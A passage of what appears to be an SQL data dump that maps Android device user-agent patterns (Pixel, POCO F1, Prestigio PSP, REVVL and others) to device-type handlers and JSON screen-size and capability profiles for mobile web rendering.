Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P10000_Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P10_Style) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P20 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P60) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":3.375,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; P600) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PAR-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PAR-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PAR-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PBAM00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":760,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PEARL A6) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PIC-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PIC-LX9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; POCO F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; POCOPHONE F1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":393,\"screenHeight\":817,\"pixelRatio\":2.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRA-AL00) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRA-AL00X) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRA-LA1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRA-LX1) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRA-LX2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRA-LX3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRA-TL10) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PRO6084FPGE01) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP3406DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP3416DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP3495DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP3514DUO_RU) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP3515DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP5522DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP5545DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP5553DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP7546DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSP7610DUO) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":780,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PSPCL30A0) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_prestigio_psp','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PassPlus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Perla) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Philips_S260) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_philips','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Phonenix50S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Photo Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Photo_P15_Lite) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Pixel 2 XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":823,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Pixel 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Pixel C) AppleWebKit/* (KHTML, like Gecko) Chrome Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":900,\"screenHeight\":1280,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Pixel XL) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":3.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Pixel) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":411,\"screenHeight\":731,\"pixelRatio\":2.625,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Platinum D5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Platinum_A4) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Platinum_B5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Plume L1 Plus) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Plume L2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Plume L2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Plume L3 Smart) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":750,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Plume L3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Plume P8 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Pocket_18x9) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Point X502) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Point_X2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Power 2 Pro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Power 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Power 5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; PowerFiveMax2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Power_3L) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Power_3S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Power_5) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Power_5S) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Prime_18x9_LTE) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":366,\"screenHeight\":732,\"pixelRatio\":1.75,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Pure Micro) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Q10S53IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Q10S55IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Q10S57IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Q10S5IN4GR) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Q10S6IN4G) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Q7) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":640,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; QS5509A) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Quantum Five) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":570,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; Quantum Mini) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; QuartzT10-3) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"tablet\",\"markup\":\"tablet\",\"screenWidth\":533,\"screenHeight\":853,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; R255B) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RAINBOW) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":640,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; REVVL 2 PLUS) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":3,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; REVVL 2) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RG650) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":360,\"screenHeight\":720,\"pixelRatio\":2,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RIO_BN) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile Safari/*','android_mozilla','{\"type\":\"mobile\",\"markup\":\"xhtml\",\"screenWidth\":320,\"screenHeight\":534,\"pixelRatio\":1.5,\"jsSupport\":1,\"imageFormats\":[\"png\",\"jpg\",\"gif\"]}'),('Mozilla/5.0 (Linux; Android 8.*; RIO_ZAM) AppleWebKit/* (KHTML, like Gecko) Chrome Mobile 